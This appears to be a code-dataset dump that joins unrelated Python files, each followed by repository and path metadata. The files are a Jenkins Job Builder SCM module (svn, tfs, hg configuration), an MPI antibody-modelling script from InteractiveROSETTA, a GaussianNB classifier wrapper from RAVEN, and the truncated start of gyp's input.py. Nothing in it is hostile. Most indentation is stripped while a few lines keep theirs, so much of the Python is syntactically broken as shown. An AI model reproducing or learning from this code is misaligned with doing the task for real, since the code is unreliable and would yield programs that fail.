:arg str minimum-blessing: minimum blessing level to consider (optional)
:arg str parcel-builder-file: name of the file to generate as input to
a later parcel building step (optional - if not specified, then no
parcel builder file will be generated)
:arg list pundles:
:(package or bundle): (`dict`): A package or bundle to check
Example:
.. literalinclude:: /../../tests/scm/fixtures/store001.yaml
"""
namespace = 'org.jenkinsci.plugins.visualworks_store'
scm = XML.SubElement(xml_parent, 'scm',
{'class': '{0}.StoreSCM'.format(namespace)})
if 'script' in data:
XML.SubElement(scm, 'scriptName').text = data['script']
else:
raise JenkinsJobsException("Must specify a script name")
if 'repository' in data:
XML.SubElement(scm, 'repositoryName').text = data['repository']
else:
raise JenkinsJobsException("Must specify a repository name")
pundle_specs = data.get('pundles', [])
if not pundle_specs:
raise JenkinsJobsException("At least one pundle must be specified")
valid_pundle_types = ['package', 'bundle']
pundles = XML.SubElement(scm, 'pundles')
for pundle_spec in pundle_specs:
pundle = XML.SubElement(pundles, '{0}.PundleSpec'.format(namespace))
pundle_type = next(iter(pundle_spec))
pundle_name = pundle_spec[pundle_type]
if pundle_type not in valid_pundle_types:
raise JenkinsJobsException(
                'pundle type must be one of: '
+ ', '.join(valid_pundle_types))
else:
XML.SubElement(pundle, 'name').text = pundle_name
XML.SubElement(pundle, 'pundleType').text = pundle_type.upper()
if 'version-regex' in data:
XML.SubElement(scm, 'versionRegex').text = data['version-regex']
if 'minimum-blessing' in data:
XML.SubElement(scm, 'minimumBlessingLevel').text = \
data['minimum-blessing']
if 'parcel-builder-file' in data:
XML.SubElement(scm, 'generateParcelBuilderInputFile').text = 'true'
XML.SubElement(scm, 'parcelBuilderInputFilename').text = \
data['parcel-builder-file']
else:
XML.SubElement(scm, 'generateParcelBuilderInputFile').text = 'false'
def svn(parser, xml_parent, data):
"""yaml: svn
Specifies the svn SCM repository for this job.
:arg str url: URL of the svn repository
:arg str basedir: location relative to the workspace root to checkout to
(default '.')
:arg str credentials-id: optional argument to specify the ID of credentials
to use
:arg str repo-depth: Repository depth. Can be one of 'infinity', 'empty',
'files', 'immediates' or 'unknown'. (default 'infinity')
:arg bool ignore-externals: Ignore Externals. (default false)
    :arg str workspaceupdater: optional argument to specify how to update the
workspace (default wipeworkspace)
:supported values:
* **wipeworkspace** - deletes the workspace before checking out
* **revertupdate** - do an svn revert then an svn update
* **emulateclean** - delete unversioned/ignored files then update
* **update** - do an svn update as much as possible
:arg list(str) excluded-users: list of users to ignore revisions from
when polling for changes (if polling is enabled; parameter is optional)
:arg list(str) included-regions: list of file/folders to include
(optional)
:arg list(str) excluded-regions: list of file/folders to exclude (optional)
:arg list(str) excluded-commit-messages: list of commit messages to exclude
(optional)
:arg str exclusion-revprop-name: revision svn-property to ignore (optional)
:arg bool ignore-property-changes-on-directories: ignore svn-property only
changes of directories (default false)
:arg bool filter-changelog: If set Jenkins will apply the same inclusion
and exclusion patterns for displaying changelog entries as it does for
polling for changes (default false)
:arg list repos: list of repositories to checkout (optional)
:arg str viewvc-url: URL of the svn web interface (optional)
:Repo:
* **url** (`str`) -- URL for the repository
* **basedir** (`str`) -- Location relative to the workspace root
to checkout to (default '.')
* **credentials-id** - optional ID of credentials to use
* **repo-depth** - Repository depth. Can be one of 'infinity',
'empty', 'files', 'immediates' or 'unknown'. (default 'infinity')
* **ignore-externals** - Ignore Externals. (default false)
Multiple repos example:
.. literalinclude:: /../../tests/scm/fixtures/svn-multiple-repos-001.yaml
Advanced commit filtering example:
.. literalinclude:: /../../tests/scm/fixtures/svn-regions-001.yaml
"""
scm = XML.SubElement(xml_parent, 'scm', {'class':
'hudson.scm.SubversionSCM'})
if 'viewvc-url' in data:
browser = XML.SubElement(
scm, 'browser', {'class': 'hudson.scm.browsers.ViewSVN'})
XML.SubElement(browser, 'url').text = data['viewvc-url']
locations = XML.SubElement(scm, 'locations')
def populate_repo_xml(parent, data):
module = XML.SubElement(parent,
'hudson.scm.SubversionSCM_-ModuleLocation')
XML.SubElement(module, 'remote').text = data['url']
XML.SubElement(module, 'local').text = data.get('basedir', '.')
if 'credentials-id' in data:
XML.SubElement(module, 'credentialsId').text = data[
'credentials-id']
repo_depths = ['infinity', 'empty', 'files', 'immediates', 'unknown']
repo_depth = data.get('repo-depth', 'infinity')
if repo_depth not in repo_depths:
raise InvalidAttributeError('repo_depth', repo_depth, repo_depths)
XML.SubElement(module, 'depthOption').text = repo_depth
XML.SubElement(module, 'ignoreExternalsOption').text = str(
data.get('ignore-externals', False)).lower()
if 'repos' in data:
repos = data['repos']
for repo in repos:
populate_repo_xml(locations, repo)
elif 'url' in data:
populate_repo_xml(locations, data)
else:
raise JenkinsJobsException("A top level url or repos list must exist")
    updater = data.get('workspaceupdater', 'wipeworkspace')
    if updater == 'wipeworkspace':
        updaterclass = 'CheckoutUpdater'
    elif updater == 'revertupdate':
        updaterclass = 'UpdateWithRevertUpdater'
    elif updater == 'emulateclean':
        updaterclass = 'UpdateWithCleanUpdater'
    elif updater == 'update':
        updaterclass = 'UpdateUpdater'
    else:
        # Fail explicitly instead of hitting a NameError on updaterclass below
        raise InvalidAttributeError(
            'workspaceupdater', updater,
            ['wipeworkspace', 'revertupdate', 'emulateclean', 'update'])
XML.SubElement(scm, 'workspaceUpdater', {'class':
'hudson.scm.subversion.' + updaterclass})
mapping = [
# option, xml name, default value
("excluded-regions", 'excludedRegions', []),
("included-regions", 'includedRegions', []),
("excluded-users", 'excludedUsers', []),
("exclusion-revprop-name", 'excludedRevprop', ''),
("excluded-commit-messages", 'excludedCommitMessages', []),
("ignore-property-changes-on-directories", 'ignoreDirPropChanges',
False),
("filter-changelog", 'filterChangelog', False),
]
for optname, xmlname, defvalue in mapping:
if isinstance(defvalue, list):
val = '\n'.join(data.get(optname, defvalue))
else:
val = data.get(optname, defvalue)
# Skip adding xml entry if default is empty and no value given
if not val and (defvalue in ['', []]):
continue
xe = XML.SubElement(scm, xmlname)
if isinstance(defvalue, bool):
xe.text = str(val).lower()
else:
xe.text = str(val)
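# Editor's sketch (illustrative, not part of the original module): a minimal
# JJB YAML fragment for the svn macro above; values are hypothetical.
#
#   scm:
#     - svn:
#         url: https://svn.example.com/repo/trunk
#         basedir: .
#         workspaceupdater: update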
def tfs(parser, xml_parent, data):
"""yaml: tfs
Specifies the Team Foundation Server repository for this job.
Requires the Jenkins :jenkins-wiki:`Team Foundation Server Plugin
<Team+Foundation+Server+Plugin>`.
**NOTE**: TFS Password must be entered manually on the project if a
user name is specified. The password will be overwritten with an empty
value every time the job is rebuilt with Jenkins Job Builder.
:arg str server-url: The name or URL of the team foundation server.
If the server has been registered on the machine then it is only
necessary to enter the name.
:arg str project-path: The name of the project as it is registered on the
server.
:arg str login: The user name that is registered on the server. The user
name must contain the name and the domain name. Entered as
domain\\\\user or user\@domain (optional).
        **NOTE**: You must enter at least two slashes for the
domain\\\\user format in JJB YAML. It will be rendered normally.
:arg str use-update: If true, Hudson will not delete the workspace at end
of each build. This causes the artifacts from the previous build to
remain when a new build starts. (default true)
:arg str local-path: The folder where all files will be retrieved into.
The folder name is a relative path, under the workspace of the current
job. (default .)
:arg str workspace: The name of the workspace under which the source
should be retrieved. This workspace is created at the start of a
download, and deleted at the end. You can normally omit the property
unless you want to name a workspace to avoid conflicts on the server
(i.e. when you have multiple projects on one server talking to a
Team Foundation Server). (default Hudson-${JOB_NAME}-${NODE_NAME})
The TFS plugin supports the following macros that are replaced in the
workspace name:
* ${JOB_NAME} - The name of the job.
* ${USER_NAME} - The user name that the Hudson server or slave is
running as.
* ${NODE_NAME} - The name of the node/slave that the plugin currently
is executed on. Note that this is not the hostname, this value is
the Hudson configured name of the slave/node.
* ${ENV} - The environment variable that is set on the master or slave.
:arg dict web-access: Adds links in "changes" views within Jenkins to an
external system for browsing the details of those changes. The "Auto"
selection attempts to infer the repository browser from other jobs,
if supported by the SCM and a job with matching SCM details can be
found. (optional, default Auto).
:web-access value:
* **web-url** -- Enter the URL to the TSWA server. The plugin will
strip the last path (if any) of the URL when building URLs for
change set pages and other pages. (optional, default
uses server-url)
Examples:
.. literalinclude:: /../../tests/scm/fixtures/tfs-001.yaml
.. literalinclude:: /../../tests/scm/fixtures/tfs-002.yaml
"""
tfs = XML.SubElement(xml_parent, 'scm',
{'class': 'hudson.plugins.tfs.'
'TeamFoundationServerScm'})
XML.SubElement(tfs, 'serverUrl').text = str(
data.get('server-url', ''))
XML.SubElement(tfs, 'projectPath').text = str(
data.get('project-path', ''))
XML.SubElement(tfs, 'localPath').text = str(
data.get('local-path', '.'))
XML.SubElement(tfs, 'workspaceName').text = str(
data.get('workspace', 'Hudson-${JOB_NAME}-${NODE_NAME}'))
    # TODO: In the future, it would be nice to have a place that can pull
# passwords into JJB without having to commit them in plaintext. This
# could also integrate nicely with global configuration options.
XML.SubElement(tfs, 'userPassword')
XML.SubElement(tfs, 'userName').text = str(
data.get('login', ''))
XML.SubElement(tfs, 'useUpdate').text = str(
data.get('use-update', True))
store = data.get('web-access', None)
if 'web-access' in data and isinstance(store, list):
web = XML.SubElement(tfs, 'repositoryBrowser',
{'class': 'hudson.plugins.tfs.browsers.'
'TeamSystemWebAccessBrowser'})
XML.SubElement(web, 'url').text = str(store[0].get('web-url', None))
elif 'web-access' in data and store is None:
XML.SubElement(tfs, 'repositoryBrowser', {'class': 'hudson.'
'plugins.tfs.browsers.'
'TeamSystemWebAccess'
'Browser'})
def workspace(parser, xml_parent, data):
"""yaml: workspace
Specifies the cloned workspace for this job to use as a SCM source.
Requires the Jenkins :jenkins-wiki:`Clone Workspace SCM Plugin
<Clone+Workspace+SCM+Plugin>`.
    The job the workspace is cloned from must be configured with a
clone-workspace publisher
:arg str parent-job: The name of the parent job to clone the
workspace from.
:arg str criteria: Set the criteria to determine what build of the parent
project to use. Can be one of 'Any', 'Not Failed' or 'Successful'.
(default: Any)
Example:
.. literalinclude:: /../../tests/scm/fixtures/workspace001.yaml
"""
workspace = XML.SubElement(xml_parent, 'scm', {'class': 'hudson.plugins.'
'cloneworkspace.CloneWorkspaceSCM'})
XML.SubElement(workspace, 'parentJobName').text = str(
data.get('parent-job', ''))
criteria_list = ['Any', 'Not Failed', 'Successful']
criteria = data.get('criteria', 'Any').title()
if 'criteria' in data and criteria not in criteria_list:
raise JenkinsJobsException(
'clone-workspace criteria must be one of: '
+ ', '.join(criteria_list))
else:
XML.SubElement(workspace, 'criteria').text = criteria
def hg(parser, xml_parent, data):
"""yaml: hg
Specifies the mercurial SCM repository for this job.
Requires the Jenkins :jenkins-wiki:`Mercurial Plugin <Mercurial+Plugin>`.
:arg str url: URL of the hg repository
:arg str credentials-id: ID of credentials to use to connect (optional)
:arg str revision-type: revision type to use (default 'branch')
:arg str revision: the branch or tag name you would like to track
(default 'default')
:arg list(str) modules: reduce unnecessary builds by specifying a list of
"modules" within the repository. A module is a directory name within
the repository that this project lives in. (default '')
:arg bool clean: wipe any local modifications or untracked files in the
repository checkout (default false)
:arg str subdir: check out the Mercurial repository into this
subdirectory of the job's workspace (optional)
:arg bool disable-changelog: do not calculate the Mercurial changelog
for each build (default false)
:arg str browser: what repository browser to use
:browsers supported:
* **auto** - (default)
* **bitbucketweb** - https://www.bitbucket.org/
* **fisheye** - https://www.atlassian.com/software/fisheye
* **googlecode** - https://code.google.com/
* **hgweb** - https://www.selenic.com/hg/help/hgweb
* **kilnhg** - https://www.fogcreek.com/kiln/
* **rhodecode** - https://rhodecode.com/ (versions >= 1.2)
* **rhodecode-pre-1.2.0** - https://rhodecode.com/ (versions < 1.2)
:arg str browser-url: url for the repository browser
(required if browser is set)
Example:
.. literalinclude:: ../../tests/scm/fixtures/hg02.yaml
"""
scm = XML.SubElement(xml_parent, 'scm', {'class':
'hudson.plugins.mercurial.MercurialSCM'})
if 'url' in data:
XML.SubElement(scm, 'source').text = data['url']
else:
raise JenkinsJobsException("A top level url must exist")
if 'credentials-id' in data:
XML.SubElement(scm, 'credentialsId').text = data['credentials-id']
revision_type_dict = {
'branch': 'BRANCH',
'tag': 'TAG',
}
try:
revision_type = revision_type_dict[data.get('revision-type', 'branch')]
except KeyError:
raise JenkinsJobsException('Invalid revision-type %r' %
data.get('revision-type'))
XML.SubElement(scm, 'revisionType').text = revision_type
XML.SubElement(scm, 'revision').text = data.get('revision', 'default')
if 'subdir' in data:
XML.SubElement(scm, 'subdir').text = data['subdir']
xc = XML.SubElement(scm, 'clean')
xc.text = str(data.get('clean', False)).lower()
modules = data.get('modules', '')
if isinstance(modules, list):
modules = " ".join(modules)
XML.SubElement(scm, 'modules').text = modules
xd = XML.SubElement(scm, 'disableChangeLog')
xd.text = str(data.get('disable-changelog', False)).lower()
browser = data.get('browser', 'auto')
browserdict = {
'auto': '',
        'bitbucketweb': 'BitBucket',
'fisheye': 'FishEye',
'googlecode': 'GoogleCode',
'hgweb': 'HgWeb',
'kilnhg': 'KilnHG',
'rhodecode': 'RhodeCode',
'rhodecode-pre-1.2.0': 'RhodeCodeLegacy'
}
if browser not in browserdict:
raise JenkinsJobsException("Browser entered is not valid must be one "
"of: %s" % ", ".join(browserdict.keys()))
if browser != 'auto':
bc = XML.SubElement(scm, 'browser',
{'class': 'hudson.plugins.mercurial.browser.' +
browserdict[browser]})
if 'browser-url' in data:
XML.SubElement(bc, 'url').text = data['browser-url']
else:
raise JenkinsJobsException("A browser-url must be specified along "
"with browser.")
class SCM(jenkins_jobs.modules.base.Base):
sequence = 30
component_type = 'scm'
component_list_type = 'scm'
def gen_xml(self, parser, xml_parent, data):
scms_parent = XML.Element('scms')
for scm in data.get('scm', []):
self.registry.dispatch('scm', parser, scms_parent, scm)
scms_count = len(scms_parent)
if scms_count == 0:
XML.SubElement(xml_parent, 'scm', {'class': 'hudson.scm.NullSCM'})
elif scms_count == 1:
xml_parent.append(scms_parent[0])
else:
class_name = 'org.jenkinsci.plugins.multiplescms.MultiSCM'
xml_attribs = {'class': class_name}
xml_parent = XML.SubElement(xml_parent, 'scm', xml_attribs)
xml_parent.append(scms_parent)
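# Editor's note (illustrative, not part of the original module): gen_xml above
# emits hudson.scm.NullSCM when no scm entries are given, attaches a single
# entry's <scm> element directly, and for multiple entries wraps them as
#   <scm class="org.jenkinsci.plugins.multiplescms.MultiSCM"><scms>...</scms></scm>
# which is why the Multiple SCMs plugin is required in that case.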
|
madAndroid/jenkins-job-builder
|
jenkins_jobs/modules/scm.py
|
Python
|
apache-2.0
| 49,040
|
[
"Octopus"
] |
ffa986cd83d22ce6e280544e0bbeb833ec360425cf3ab2bdcff956bf40b68a8e
|
from mpi4py import MPI
import sys
import os
import glob
import subprocess
import shutil
def cleanPDB(pdbfile):
# This function will look for and remove duplicate atoms
# It will permanently modify the PDB that the user loaded
# This shouldn't cause problems for other programs though
data = []
taken_nums = {}
num_mapping = {}
# Sometimes there are PDBs that have multiple residues with the same residue index
# BioPython drops these, but it can lead to all kinds of problems later on
# So I will keep a record of the backbone atoms of the current residue and if we encounter
# a BB atom with the same residue index, we will assume it's a new residue and renumber the residue
lastBBatoms = []
altlocs_taken = ""
f = open(pdbfile.strip(), "r")
curr_res = " 0"
for aline in f:
if (aline.startswith("ATOM") or aline.startswith("HETATM")):
res = aline[22:27] # Includes residue indx + the optional alternate letter
if (res[0:4] != curr_res[0:4]): # New residue indx
altlocs_taken = res[4] # Reset the taken altlocs
curr_res = res
atomtypes = []
lastBBatoms = []
# This is only done if this is a new residue, but not a new residue indx
if (aline[22:27] != curr_res or aline[12:16] in lastBBatoms):
curr_res = res
atomtypes = []
lastBBatoms = []
# Assign the altloc to whatever the most recent altloc used was
for char in " ABCDEFGHIJKLMNOPQRSTUVWXYZ":
if (not(char in altlocs_taken)):
altlocs_taken = char + altlocs_taken
break
res = res[0:4] + altlocs_taken[0]
atomtype = aline[12:16]
if (atomtype in [" C ", " CA ", " O ", " N "]):
lastBBatoms.append(atomtype)
if (atomtype in atomtypes):
# Find a new type for this atom
stem = atomtype[0:2]
for i in range(1, 100):
if (i < 10):
newtype = stem + str(i) + " "
else:
newtype = stem + str(i)
if (not(newtype in atomtypes)):
atomtypes.append(newtype)
break
aline = aline[0:12] + newtype + aline[16:]
else:
atomtypes.append(atomtype)
# Now check for alternate forms of residues (i.e. 30A, 30B, etc.)
            # Rename these so they each have a unique number; the user can delete extras later
chain = aline[21]
if (not(chain in taken_nums.keys())):
taken_nums[chain] = []
if (not(res[0:4] in taken_nums[chain])):
taken_nums[chain].append(res[0:4])
num_mapping[chain+res] = res[0:4]
else:
try:
aline = aline[0:22] + num_mapping[chain+res] + " " + aline[27:]
                except KeyError:
# Find a new ID
lastnum = int(taken_nums[chain][len(taken_nums[chain])-1]) + 1
num_mapping[chain+res] = "%4i" % lastnum
taken_nums[chain].append("%4i" % lastnum)
aline = aline[0:22] + num_mapping[chain+res] + " " + aline[27:]
#data.append(aline.strip())
#else:
data.append(aline.strip())
f.close()
# Now write the updated data out
f = open(pdbfile.strip(), "w")
for aline in data:
f.write(aline + "\n")
f.close()
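# Editor's sketch (illustrative, not part of the original script): cleanPDB
# rewrites a PDB in place, e.g.
#   cleanPDB("grafting1/grafted.relaxed.pdb")
# after which duplicated residue indices have been renumbered or given altloc
# letters so BioPython can parse every residue.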
if (len(sys.argv) != 8):
print "Usage: mpirun python antibody_mpi.py modelname ndecoys <light-chain.fasta> <heavy-chain.fasta> antibody_path rosetta_path rosettadb_path"
exit()
modelname = sys.argv[1].strip()
ndecoys = int(sys.argv[2])
lightchain = sys.argv[3].strip()
heavychain = sys.argv[4].strip()
antibody = sys.argv[5].strip()
rosetta = sys.argv[6].strip()
# Try to find the default, single processor Rosetta binary
platform = None
binaries = glob.glob(rosetta + "/antibody_graft.default.*")
if (len(binaries) > 0):
platform = binaries[0].split("antibody_graft")[1]
platform = platform[1:] # Get rid of the leading .
else:
binaries = glob.glob(rosetta + "/antibody_graft.static.*")
if (len(binaries) > 0):
platform = binaries[0].split("antibody_graft")[1]
        platform = platform[1:] # Get rid of the leading .
rosettadb = sys.argv[7].strip()
noderank = MPI.COMM_WORLD.Get_rank()
nodesize = MPI.COMM_WORLD.Get_size()
print "platform=" + platform
for i in range(noderank, ndecoys, nodesize):
# Note to future developers: the --rosetta-platform argument is essential
# If you do not include it, it will default to <rosetta_executable>.linuxgccrelease
# This a problem, because that executable is whatever the last build type was
# So if the last build was the MPI build (what it usually is), then that executable is the MPI one
# If you try to run the MPI executable within a Python script that is mpi4py aware, it crashes
if (platform):
ABargs = "python " + antibody + "/antibody.py --light-chain " + lightchain + " --heavy-chain " + heavychain + " --antibody-database=" + antibody + "/antibody_database --blast-database=" + antibody + "/blast_database --rosetta-platform=" + platform + " --rosetta-bin=" + rosetta + " --rosetta-database=" + rosettadb + " --prefix=grafting" + str(i+1) + "/"
else:
ABargs = "python " + antibody + "/antibody.py --light-chain " + lightchain + " --heavy-chain " + heavychain + " --antibody-database=" + antibody + "/antibody_database --blast-database=" + antibody + "/blast_database --rosetta-bin=" + rosetta + " --rosetta-database=" + rosettadb + " --prefix=grafting" + str(i+1) + "/"
print "Starting antibody model " + str(i+1) + "..."
f = open("out" + str(i), "w")
f.write(ABargs + "\n")
f.close()
(out, err) = subprocess.Popen(ABargs, shell=True, stdout=subprocess.PIPE).communicate()
print ABargs
    # The Chothia numbering gives rise to duplicate residues that BioPython cannot process
    # This gives all the residues unique numbers so they do not cause issues later on
cleanPDB("grafting" + str(i+1) + "/grafted.relaxed.pdb")
os.rename("grafting" + str(i+1) + "/grafted.relaxed.pdb", modelname + ("_%4.4i" % (i+1)) + ".pdb")
shutil.rmtree("grafting" + str(i+1), ignore_errors=True)
MPI.Finalize()
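# Editor's sketch of an invocation (illustrative paths), matching the usage
# string above:
#   mpirun -np 8 python antibody_mpi.py mymodel 100 light.fasta heavy.fasta \
#       /path/to/antibody /path/to/rosetta/bin /path/to/rosetta_database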
|
schenc3/InteractiveROSETTA
|
InteractiveROSETTA/server/antibody_mpi.py
|
Python
|
gpl-2.0
| 6,537
|
[
"BLAST",
"Biopython"
] |
b55e4e22fcde19fa603a5c1015410db48b5db39de183c87621a1daa809055760
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Jan 21, 2020
@author: alfoa, wangc
GaussianNB Classifier
Gaussian Naive Bayes (GaussianNB) classifier
"""
#Internal Modules (Lazy Importer)--------------------------------------------------------------------
#Internal Modules (Lazy Importer) End----------------------------------------------------------------
#External Modules------------------------------------------------------------------------------------
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from SupervisedLearning.ScikitLearn import ScikitLearnBase
from utils import InputData, InputTypes
#Internal Modules End--------------------------------------------------------------------------------
class GaussianNB(ScikitLearnBase):
"""
GaussianNB Classifier
Gaussian Naive Bayes (GaussianNB) classifier
"""
info = {'problemtype':'classification', 'normalize':True}
def __init__(self):
"""
Constructor that will appropriately initialize a supervised learning object
@ In, None
@ Out, None
"""
super().__init__()
import sklearn
import sklearn.naive_bayes
self.model = sklearn.naive_bayes.GaussianNB
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for
class cls.
@ In, cls, the class for which we are retrieving the specification
@ Out, inputSpecification, InputData.ParameterInput, class to use for
specifying input of cls.
"""
specs = super(GaussianNB, cls).getInputSpecification()
specs.description = r"""The \\textit{GaussianNB} classifier implements the Gaussian Naive Bayes
algorithm for classification.
The likelihood of the features is assumed to be Gaussian:
\begin{equation}
P(x_i \mid y) = \frac{1}{\sqrt{2\pi\sigma^2_y}} \exp\left(-\frac{(x_i -
\mu_y)^2}{2\sigma^2_y}\right)
\end{equation}
The parameters $\sigma_y$ and $\mu_y$ are estimated using maximum likelihood.
\zNormalizationPerformed{GaussianNB}
"""
specs.addSub(InputData.parameterInputFactory("priors", contentType=InputTypes.FloatListType,
descr=r"""Prior probabilities of the classes. If specified the priors are
not adjusted according to the data. \nb the number of elements specified here must
match the number of classes in the data set used in the training stage.""", default=None))
specs.addSub(InputData.parameterInputFactory("var_smoothing", contentType=InputTypes.FloatType,
descr=r"""Portion of the largest variance of all features that is added to variances for
calculation stability.""", default=1e-9))
return specs
def _handleInput(self, paramInput):
"""
Function to handle the common parts of the distribution parameter input.
@ In, paramInput, ParameterInput, the already parsed input.
@ Out, None
"""
super()._handleInput(paramInput)
settings, notFound = paramInput.findNodesAndExtractValues(['priors', 'var_smoothing'])
# notFound must be empty
assert(not notFound)
self.initializeModel(settings)
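# --- Illustrative sketch (added; not part of the RAVEN source). The wrapper
# above delegates to sklearn.naive_bayes.GaussianNB, so the effect of the
# 'priors' and 'var_smoothing' settings can be previewed directly on the
# underlying estimator. The data values below are made up for illustration.
#
# >>> import numpy as np
# >>> from sklearn.naive_bayes import GaussianNB as SkGaussianNB
# >>> X = np.array([[-2.0], [-1.0], [1.0], [2.0]])
# >>> y = np.array([0, 0, 1, 1])
# >>> clf = SkGaussianNB(priors=None, var_smoothing=1e-9).fit(X, y)
# >>> clf.predict([[0.8]])
# array([1])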
|
idaholab/raven
|
framework/SupervisedLearning/ScikitLearn/NaiveBayes/GaussianNBClassifier.py
|
Python
|
apache-2.0
| 4,245
|
[
"Gaussian"
] |
8c5871c82791ba9cc83703258827a5c150f6931c2e3e5d10947b3d45b41fd4f2
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import ast
import gyp.common
import gyp.simple_copy
import multiprocessing
import os.path
import re
import shlex
import signal
import subprocess
import sys
import threading
import traceback
from distutils.version import StrictVersion
from gyp.common import GypError
from gyp.common import OrderedSet
PY3 = bytes != str
# A list of types that are treated as linkable.
linkable_types = [
"executable",
"shared_library",
"loadable_module",
"mac_kernel_extension",
"windows_driver",
]
# A list of sections that contain links to other targets.
dependency_sections = ["dependencies", "export_dependent_settings"]
# base_path_sections is a list of sections defined by GYP that contain
# pathnames. The generators can provide more keys, the two lists are merged
# into path_sections, but you should call IsPathSection instead of using either
# list directly.
base_path_sections = [
"destination",
"files",
"include_dirs",
"inputs",
"libraries",
"outputs",
"sources",
]
path_sections = set()
# These per-process dictionaries are used to cache build file data when loading
# in parallel mode.
per_process_data = {}
per_process_aux_data = {}
def IsPathSection(section):
# If section ends in one of the '=+?!' characters, it's applied to a section
# without the trailing characters. '/' is notably absent from this list,
# because there's no way for a regular expression to be treated as a path.
while section and section[-1:] in "=+?!":
section = section[:-1]
if section in path_sections:
return True
# Sections matching the regexp '_(dir|file|path)s?$' are also
# considered PathSections. Using manual string matching since that
# is much faster than the regexp and this can be called hundreds of
# thousands of times so micro performance matters.
if "_" in section:
tail = section[-6:]
if tail[-1] == "s":
tail = tail[:-1]
if tail[-5:] in ("_file", "_path"):
return True
return tail[-4:] == "_dir"
return False
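# Illustrative doctest (added, not in the gyp source): the suffix heuristic
# alone classifies names like these, independent of the path_sections registry.
# >>> IsPathSection("defines")
# False
# >>> IsPathSection("outputs_dir")
# True
# >>> IsPathSection("map_file")
# True
# >>> IsPathSection("include_dirs+")  # trailing '=+?!' characters are stripped first
# True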
# base_non_configuration_keys is a list of key names that belong in the target
# itself and should not be propagated into its configurations. It is merged
# with a list that can come from the generator to
# create non_configuration_keys.
base_non_configuration_keys = [
# Sections that must exist inside targets and not configurations.
"actions",
"configurations",
"copies",
"default_configuration",
"dependencies",
"dependencies_original",
"libraries",
"postbuilds",
"product_dir",
"product_extension",
"product_name",
"product_prefix",
"rules",
"run_as",
"sources",
"standalone_static_library",
"suppress_wildcard",
"target_name",
"toolset",
"toolsets",
"type",
# Sections that can be found inside targets or configurations, but that
# should not be propagated from targets into their configurations.
"variables",
]
non_configuration_keys = []
# Keys that do not belong inside a configuration dictionary.
invalid_configuration_keys = [
"actions",
"all_dependent_settings",
"configurations",
"dependencies",
"direct_dependent_settings",
"libraries",
"link_settings",
"sources",
"standalone_static_library",
"target_name",
"type",
]
# Controls whether or not the generator supports multiple toolsets.
multiple_toolsets = False
# Paths for converting filelist paths to output paths: {
# toplevel,
# qualified_output_dir,
# }
generator_filelist_paths = None
def GetIncludedBuildFiles(build_file_path, aux_data, included=None):
"""Return a list of all build files included into build_file_path.
The returned list will contain build_file_path as well as all other files
that it included, either directly or indirectly. Note that the list may
contain files that were included into a conditional section that evaluated
to false and was not merged into build_file_path's dict.
aux_data is a dict containing a key for each build file or included build
file. Those keys provide access to dicts whose "included" keys contain
lists of all other files included by the build file.
included should be left at its default None value by external callers. It
is used for recursion.
The returned list will not contain any duplicate entries. Each build file
in the list will be relative to the current directory.
"""
if included is None:
included = []
if build_file_path in included:
return included
included.append(build_file_path)
for included_build_file in aux_data[build_file_path].get("included", []):
GetIncludedBuildFiles(included_build_file, aux_data, included)
return included
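# Illustrative doctest (added; the aux_data shape is assumed from the
# docstring above, not taken from a real run):
# >>> aux = {'a.gyp': {'included': ['common.gypi']}, 'common.gypi': {}}
# >>> GetIncludedBuildFiles('a.gyp', aux)
# ['a.gyp', 'common.gypi']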
def CheckedEval(file_contents):
"""Return the eval of a gyp file.
The gyp file is restricted to dictionaries and lists only, and
repeated keys are not allowed.
Note that this is slower than eval() is.
"""
syntax_tree = ast.parse(file_contents)
assert isinstance(syntax_tree, ast.Module)
c1 = syntax_tree.body
assert len(c1) == 1
c2 = c1[0]
assert isinstance(c2, ast.Expr)
return CheckNode(c2.value, [])
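# Illustrative doctest (added, not in the source). Only literal strings,
# lists, and dicts are accepted, and repeated keys raise GypError:
# >>> CheckedEval("{'targets': [{'target_name': 'foo'}]}")
# {'targets': [{'target_name': 'foo'}]}
# >>> CheckedEval("{'a': 'x', 'a': 'y'}")   # raises GypError (repeated key 'a')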
def CheckNode(node, keypath):
if isinstance(node, ast.Dict):
dict = {}
for key, value in zip(node.keys, node.values):
assert isinstance(key, ast.Str)
key = key.s
if key in dict:
raise GypError(
"Key '"
+ key
+ "' repeated at level "
+ repr(len(keypath) + 1)
+ " with key path '"
+ ".".join(keypath)
+ "'"
)
kp = list(keypath) # Make a copy of the list for descending this node.
kp.append(key)
dict[key] = CheckNode(value, kp)
return dict
elif isinstance(node, ast.List):
children = []
for index, child in enumerate(node.elts):
kp = list(keypath) # Copy list.
kp.append(repr(index))
children.append(CheckNode(child, kp))
return children
elif isinstance(node, ast.Str):
return node.s
else:
raise TypeError(
"Unknown AST node at key path '" + ".".join(keypath) + "': " + repr(node)
)
def LoadOneBuildFile(build_file_path, data, aux_data, includes, is_target, check):
if build_file_path in data:
return data[build_file_path]
if os.path.exists(build_file_path):
# Open the build file for read ('r') with universal-newlines mode ('U')
# to make sure platform-specific newlines ('\r\n' or '\r') are converted
# to '\n', which would otherwise cause eval() to fail.
if sys.platform == "zos":
# On z/OS, universal-newlines mode treats the file as an ascii file. But since
# node-gyp produces ebcdic files, do not use that mode.
build_file_contents = open(build_file_path, "r").read()
else:
build_file_contents = open(build_file_path, "rU").read()
else:
raise GypError("%s not found (cwd: %s)" % (build_file_path, os.getcwd()))
build_file_data = None
try:
if check:
build_file_data = CheckedEval(build_file_contents)
else:
build_file_data = eval(build_file_contents, {"__builtins__": {}}, None)
except SyntaxError as e:
e.filename = build_file_path
raise
except Exception as e:
gyp.common.ExceptionAppend(e, "while reading " + build_file_path)
raise
if type(build_file_data) is not dict:
raise GypError("%s does not evaluate to a dictionary." % build_file_path)
data[build_file_path] = build_file_data
aux_data[build_file_path] = {}
# Scan for includes and merge them in.
if "skip_includes" not in build_file_data or not build_file_data["skip_includes"]:
try:
